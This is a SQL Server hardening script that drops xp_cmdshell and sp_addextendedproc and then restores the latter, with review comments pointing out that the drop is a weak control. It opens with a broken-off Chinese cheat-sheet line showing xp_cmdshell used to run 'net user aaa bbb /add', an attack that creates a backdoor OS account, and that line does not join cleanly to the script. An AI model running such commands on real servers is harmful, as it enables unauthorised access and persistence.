1).XP_CMDSHELL <|>cmd.exe /c net user aaa bbb /add<|> 人人都知道的办法,最大的好处是有回显,但是最怕
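-- Drop the xp_cmdshell extended procedure if it is still registered
-- (SQL Server 2000-era hardening snippet). The catalog check makes the batch
-- idempotent; OBJECTPROPERTY(..., 'IsExtendedProc') makes sure the object
-- found is the extended procedure and not a user procedure of the same name.
-- NOTE(review): this is not a durable control. Any login holding sysadmin can
-- re-register the procedure with sp_addextendedproc, so the mitigation that
-- actually holds is not granting sysadmin to application logins. On
-- SQL Server 2005 and later use the supported switch instead:
--   EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
--   EXEC sp_configure 'xp_cmdshell', 0;          RECONFIGURE;
-- dbo.sysobjects is a compatibility view; current versions expose sys.objects.
IF EXISTS (
    SELECT *
    FROM dbo.sysobjects
    WHERE id = OBJECT_ID(N'[dbo].[xp_cmdshell]')
      AND OBJECTPROPERTY(id, N'IsExtendedProc') = 1
)
    EXEC sp_dropextendedproc N'[dbo].[xp_cmdshell]';
GO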
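-- Stronger variant of the xp_cmdshell removal: also drop sp_addextendedproc so
-- the extended procedure cannot simply be re-registered afterwards. Both
-- objects are system procedures in master; run this batch in master with a
-- sysadmin login.
-- NOTE(review): still circumventable — sp_addextendedproc is an ordinary
-- stored procedure whose source is public and can be re-created by any
-- sysadmin. Treat it as defence in depth: alert on CREATE PROCEDURE
-- sp_addextendedproc and on DBCC ADDEXTENDEDPROC in the audit trail, and keep
-- application logins out of sysadmin. On SQL Server 2005 and later the
-- supported control is EXEC sp_configure 'xp_cmdshell', 0; RECONFIGURE;
DROP PROCEDURE sp_addextendedproc;

-- Same idempotent removal of xp_cmdshell as the single-statement version.
IF EXISTS (
    SELECT *
    FROM dbo.sysobjects
    WHERE id = OBJECT_ID(N'[dbo].[xp_cmdshell]')
      AND OBJECTPROPERTY(id, N'IsExtendedProc') = 1
)
    EXEC sp_dropextendedproc N'[dbo].[xp_cmdshell]';
GO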
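-- "还原" (restore): the stock definition of master..sp_addextendedproc, used
-- to put the system procedure back after it has been dropped as a hardening
-- step. Vendor header comment and parameter comments kept as they were.
-- NOTE(review): that this object is trivially re-creatable is exactly why
-- dropping it is a weak control. Creation of this procedure, or any execution
-- of DBCC ADDEXTENDEDPROC, on a production instance should raise an alert;
-- both need sysadmin, so restrict that role rather than rely on the drop.
CREATE PROCEDURE sp_addextendedproc --- 1996/08/30 20:13
    @functname NVARCHAR(517), /* (owner.)name of function to call */
    @dllname   VARCHAR(255)   /* name of DLL containing function */
AS
    SET IMPLICIT_TRANSACTIONS OFF
    -- Refuse to run inside an open transaction; 15002 is the system message
    -- for "cannot be executed within a transaction" (verify in sys.messages).
    IF @@TRANCOUNT > 0
    BEGIN
        RAISERROR(15002, -1, -1, 'sp_addextendedproc')
        RETURN (1)
    END
    /*
    ** Create the extended procedure mapping.
    */
    DBCC ADDEXTENDEDPROC(@functname, @dllname)
    RETURN (0) -- sp_addextendedproc
GO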